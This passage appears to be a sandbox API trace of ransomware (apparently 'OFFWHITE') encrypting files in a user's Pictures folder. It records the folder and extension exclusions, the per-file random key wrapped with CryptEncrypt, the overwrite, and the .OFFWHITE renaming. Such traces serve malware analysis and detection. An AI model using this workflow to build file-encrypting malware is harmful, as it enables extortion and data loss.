| out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b8b1850, ftCreationTime.dwHighDateTime=0x1d5e778, ftLastAccessTime.dwLowDateTime=0x2fa94180, ftLastAccessTime.dwHighDateTime=0x1d5da09, ftLastWriteTime.dwLowDateTime=0x2fa94180, ftLastWriteTime.dwHighDateTime=0x1d5da09, nFileSizeHigh=0x0, nFileSizeLow=0x4e5b, dwReserved0=0x80007e, dwReserved1=0x295e370, cFileName="3SMOvRT9Qd.bmp", cAlternateFileName="3SMOVR~1.BMP")) returned 1 [0135.304] lstrcmpiW (lpString1="3SMOvRT9Qd.bmp", lpString2=".") returned 1 [0135.304] lstrcmpiW (lpString1="3SMOvRT9Qd.bmp", lpString2="..") returned 1 [0135.304] lstrcmpiW (lpString1="3SMOvRT9Qd.bmp", lpString2="...") returned 1 [0135.304] lstrcmpiW (lpString1="3SMOvRT9Qd.bmp", lpString2="windows") returned -1 [0135.304] lstrcmpiW (lpString1="3SMOvRT9Qd.bmp", lpString2="$recycle.bin") returned 1 [0135.304] lstrcmpiW (lpString1="3SMOvRT9Qd.bmp", lpString2="rsa") returned -1 [0135.304] lstrcmpiW (lpString1="3SMOvRT9Qd.bmp", lpString2="ntuser.dat") returned -1 [0135.304] lstrcmpiW (lpString1="3SMOvRT9Qd.bmp", lpString2="programdata") returned -1 [0135.304] lstrcmpiW (lpString1="3SMOvRT9Qd.bmp", lpString2="appdata") returned -1 [0135.304] lstrcmpiW (lpString1="3SMOvRT9Qd.bmp", lpString2="program files") returned -1 [0135.304] lstrcmpiW (lpString1="3SMOvRT9Qd.bmp", lpString2="program files (x86)") returned -1 [0135.304] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\" [0135.304] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\", lpString2="3SMOvRT9Qd.bmp" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\3SMOvRT9Qd.bmp") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\3SMOvRT9Qd.bmp" [0135.304] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.304] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.304] PathFindExtensionW (pszPath="3SMOvRT9Qd.bmp") returned=".bmp" [0135.304] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0135.305] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0135.305] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0135.305] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0135.305] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0135.305] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0135.305] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0135.305] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0135.305] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0135.305] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0135.305] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0135.305] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0135.305] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0135.305] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0135.305] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0135.305] lstrcmpiW (lpString1="3SMOvRT9Qd.bmp", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.305] GetProcessHeap () returned 0x500000 [0135.305] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5319c0 [0135.305] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\3SMOvRT9Qd.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\3smovrt9qd.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0135.306] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=20059) returned 1 [0135.306] GetProcessHeap () returned 0x500000 [0135.306] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.306] GetProcessHeap () returned 0x500000 [0135.306] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.306] GetProcessHeap () returned 0x500000 [0135.306] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.306] GetProcessHeap () returned 0x500000 [0135.306] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.306] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.306] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.306] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.306] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.306] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.306] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.306] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.306] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.306] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295d610*=0x100) returned 1 [0135.307] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.307] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.307] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295d60c*=0x100) returned 1 [0135.307] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x4e5b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.307] SetLastError (dwErrCode=0x0) [0135.307] WriteFile (in: hFile=0x214, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0135.309] GetLastError () returned 0x0 [0135.309] GetLastError () returned 0x0 [0135.309] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x4f5b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.309] WriteFile (in: hFile=0x214, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0135.310] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x505b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.310] WriteFile (in: hFile=0x214, lpBuffer=0x5319c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5319c0*, lpNumberOfBytesWritten=0x295d84c*=0x8, lpOverlapped=0x0) returned 1 [0135.310] GetProcessHeap () returned 0x500000 [0135.310] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4e5b) returned 0x55b7c0 [0135.310] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.310] ReadFile (in: hFile=0x214, lpBuffer=0x55b7c0, nNumberOfBytesToRead=0x4e5b, lpNumberOfBytesRead=0x295d840, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesRead=0x295d840*=0x4e5b, lpOverlapped=0x0) returned 1 [0135.312] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.312] WriteFile (in: hFile=0x214, lpBuffer=0x55b7c0*, nNumberOfBytesToWrite=0x4e5b, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesWritten=0x295d84c*=0x4e5b, lpOverlapped=0x0) returned 1 [0135.313] GetProcessHeap () returned 0x500000 [0135.313] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55b7c0 | out: hHeap=0x500000) returned 1 [0135.313] CloseHandle (hObject=0x214) returned 1 [0135.320] GetProcessHeap () returned 0x500000 [0135.320] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.320] GetProcessHeap () returned 0x500000 [0135.320] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.320] GetProcessHeap () returned 0x500000 [0135.320] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.320] GetProcessHeap () returned 0x500000 [0135.320] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.320] lstrcpyW (in: lpString1=0x295d638, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\3SMOvRT9Qd.bmp" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\3SMOvRT9Qd.bmp") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\3SMOvRT9Qd.bmp" [0135.320] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\3SMOvRT9Qd.bmp", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\3SMOvRT9Qd.bmp.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\3SMOvRT9Qd.bmp.OFFWHITE" [0135.320] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\3SMOvRT9Qd.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\3smovrt9qd.bmp"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\3SMOvRT9Qd.bmp.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\3smovrt9qd.bmp.offwhite")) returned 1 [0135.321] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f2549a0, ftCreationTime.dwHighDateTime=0x1d5e20d, ftLastAccessTime.dwLowDateTime=0x5f294340, ftLastAccessTime.dwHighDateTime=0x1d5dcc7, ftLastWriteTime.dwLowDateTime=0x5f294340, ftLastWriteTime.dwHighDateTime=0x1d5dcc7, nFileSizeHigh=0x0, nFileSizeLow=0xe9dd, dwReserved0=0x80007e, dwReserved1=0x295e370, cFileName="a6uDdrrXX2iKdxG4nZa.png", cAlternateFileName="A6UDDR~1.PNG")) returned 1 [0135.321] lstrcmpiW (lpString1="a6uDdrrXX2iKdxG4nZa.png", lpString2=".") returned 1 [0135.321] lstrcmpiW (lpString1="a6uDdrrXX2iKdxG4nZa.png", lpString2="..") returned 1 [0135.321] lstrcmpiW (lpString1="a6uDdrrXX2iKdxG4nZa.png", lpString2="...") returned 1 [0135.321] lstrcmpiW (lpString1="a6uDdrrXX2iKdxG4nZa.png", lpString2="windows") returned -1 [0135.321] lstrcmpiW (lpString1="a6uDdrrXX2iKdxG4nZa.png", lpString2="$recycle.bin") returned 1 [0135.321] lstrcmpiW (lpString1="a6uDdrrXX2iKdxG4nZa.png", lpString2="rsa") returned -1 [0135.321] lstrcmpiW (lpString1="a6uDdrrXX2iKdxG4nZa.png", lpString2="ntuser.dat") returned -1 [0135.321] lstrcmpiW (lpString1="a6uDdrrXX2iKdxG4nZa.png", lpString2="programdata") returned -1 [0135.321] lstrcmpiW (lpString1="a6uDdrrXX2iKdxG4nZa.png", lpString2="appdata") returned -1 [0135.321] lstrcmpiW (lpString1="a6uDdrrXX2iKdxG4nZa.png", lpString2="program files") returned -1 [0135.322] lstrcmpiW (lpString1="a6uDdrrXX2iKdxG4nZa.png", lpString2="program files (x86)") returned -1 [0135.322] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\" [0135.322] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\", lpString2="a6uDdrrXX2iKdxG4nZa.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\a6uDdrrXX2iKdxG4nZa.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\a6uDdrrXX2iKdxG4nZa.png" [0135.322] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.322] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.322] PathFindExtensionW (pszPath="a6uDdrrXX2iKdxG4nZa.png") returned=".png" [0135.322] lstrcmpiW (lpString1=".png", lpString2=".exe") returned 1 [0135.322] lstrcmpiW (lpString1=".png", lpString2=".log") returned 1 [0135.322] lstrcmpiW (lpString1=".png", lpString2=".cab") returned 1 [0135.322] lstrcmpiW (lpString1=".png", lpString2=".cmd") returned 1 [0135.322] lstrcmpiW (lpString1=".png", lpString2=".com") returned 1 [0135.322] lstrcmpiW (lpString1=".png", lpString2=".cpl") returned 1 [0135.322] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0135.322] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0135.322] lstrcmpiW (lpString1=".png", lpString2=".url") returned -1 [0135.322] lstrcmpiW (lpString1=".png", lpString2=".ttf") returned -1 [0135.322] lstrcmpiW (lpString1=".png", lpString2=".mp3") returned 1 [0135.322] lstrcmpiW (lpString1=".png", lpString2=".pif") returned 1 [0135.322] lstrcmpiW (lpString1=".png", lpString2=".mp4") returned 1 [0135.322] lstrcmpiW (lpString1=".png", lpString2=".OFFWHITE") returned 1 [0135.323] lstrcmpiW (lpString1=".png", lpString2=".msi") returned 1 [0135.323] lstrcmpiW (lpString1="a6uDdrrXX2iKdxG4nZa.png", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.323] GetProcessHeap () returned 0x500000 [0135.323] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5319d0 [0135.323] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\a6uDdrrXX2iKdxG4nZa.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\a6uddrrxx2ikdxg4nza.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0135.323] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=59869) returned 1 [0135.323] GetProcessHeap () returned 0x500000 [0135.323] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.323] GetProcessHeap () returned 0x500000 [0135.323] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.323] GetProcessHeap () returned 0x500000 [0135.323] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.323] GetProcessHeap () returned 0x500000 [0135.323] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.323] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.323] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.324] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.324] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.324] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.324] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.324] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.324] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.324] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295d610*=0x100) returned 1 [0135.324] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.324] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.324] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295d60c*=0x100) returned 1 [0135.324] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xe9dd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.324] SetLastError (dwErrCode=0x0) [0135.325] WriteFile (in: hFile=0x214, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0135.327] GetLastError () returned 0x0 [0135.327] GetLastError () returned 0x0 [0135.327] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xeadd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.327] WriteFile (in: hFile=0x214, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0135.327] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xebdd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.327] WriteFile (in: hFile=0x214, lpBuffer=0x5319d0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5319d0*, lpNumberOfBytesWritten=0x295d84c*=0x8, lpOverlapped=0x0) returned 1 [0135.327] GetProcessHeap () returned 0x500000 [0135.327] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xe9dd) returned 0x55b7c0 [0135.327] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.327] ReadFile (in: hFile=0x214, lpBuffer=0x55b7c0, nNumberOfBytesToRead=0xe9dd, lpNumberOfBytesRead=0x295d840, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesRead=0x295d840*=0xe9dd, lpOverlapped=0x0) returned 1 [0135.332] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.332] WriteFile (in: hFile=0x214, lpBuffer=0x55b7c0*, nNumberOfBytesToWrite=0xe9dd, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesWritten=0x295d84c*=0xe9dd, lpOverlapped=0x0) returned 1 [0135.332] GetProcessHeap () returned 0x500000 [0135.332] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55b7c0 | out: hHeap=0x500000) returned 1 [0135.332] CloseHandle (hObject=0x214) returned 1 [0135.334] GetProcessHeap () returned 0x500000 [0135.334] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.334] GetProcessHeap () returned 0x500000 [0135.334] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.334] GetProcessHeap () returned 0x500000 [0135.334] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.334] GetProcessHeap () returned 0x500000 [0135.334] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.334] lstrcpyW (in: lpString1=0x295d638, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\a6uDdrrXX2iKdxG4nZa.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\a6uDdrrXX2iKdxG4nZa.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\a6uDdrrXX2iKdxG4nZa.png" [0135.334] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\a6uDdrrXX2iKdxG4nZa.png", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\a6uDdrrXX2iKdxG4nZa.png.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\a6uDdrrXX2iKdxG4nZa.png.OFFWHITE" [0135.334] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\a6uDdrrXX2iKdxG4nZa.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\a6uddrrxx2ikdxg4nza.png"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\a6uDdrrXX2iKdxG4nZa.png.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\a6uddrrxx2ikdxg4nza.png.offwhite")) returned 1 [0135.335] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7dd02120, ftCreationTime.dwHighDateTime=0x1d5d9ce, ftLastAccessTime.dwLowDateTime=0xe2a1f740, ftLastAccessTime.dwHighDateTime=0x1d5e4fa, ftLastWriteTime.dwLowDateTime=0xe2a1f740, ftLastWriteTime.dwHighDateTime=0x1d5e4fa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x80007e, dwReserved1=0x295e370, cFileName="OJSDcgvJ7QYZh", cAlternateFileName="OJSDCG~1")) returned 1 [0135.335] lstrcmpiW (lpString1="OJSDcgvJ7QYZh", lpString2=".") returned 1 [0135.335] lstrcmpiW (lpString1="OJSDcgvJ7QYZh", lpString2="..") returned 1 [0135.335] lstrcmpiW (lpString1="OJSDcgvJ7QYZh", lpString2="...") returned 1 [0135.335] lstrcmpiW (lpString1="OJSDcgvJ7QYZh", lpString2="windows") returned -1 [0135.335] lstrcmpiW (lpString1="OJSDcgvJ7QYZh", lpString2="$recycle.bin") returned 1 [0135.335] lstrcmpiW (lpString1="OJSDcgvJ7QYZh", lpString2="rsa") returned -1 [0135.335] lstrcmpiW (lpString1="OJSDcgvJ7QYZh", lpString2="ntuser.dat") returned 1 [0135.335] lstrcmpiW (lpString1="OJSDcgvJ7QYZh", lpString2="programdata") returned -1 [0135.335] lstrcmpiW (lpString1="OJSDcgvJ7QYZh", lpString2="appdata") returned 1 [0135.335] lstrcmpiW (lpString1="OJSDcgvJ7QYZh", lpString2="program files") returned -1 [0135.335] lstrcmpiW (lpString1="OJSDcgvJ7QYZh", lpString2="program files (x86)") returned -1 [0135.335] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\" [0135.336] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\", lpString2="OJSDcgvJ7QYZh" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh" [0135.336] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\" [0135.336] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\" [0135.336] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\", 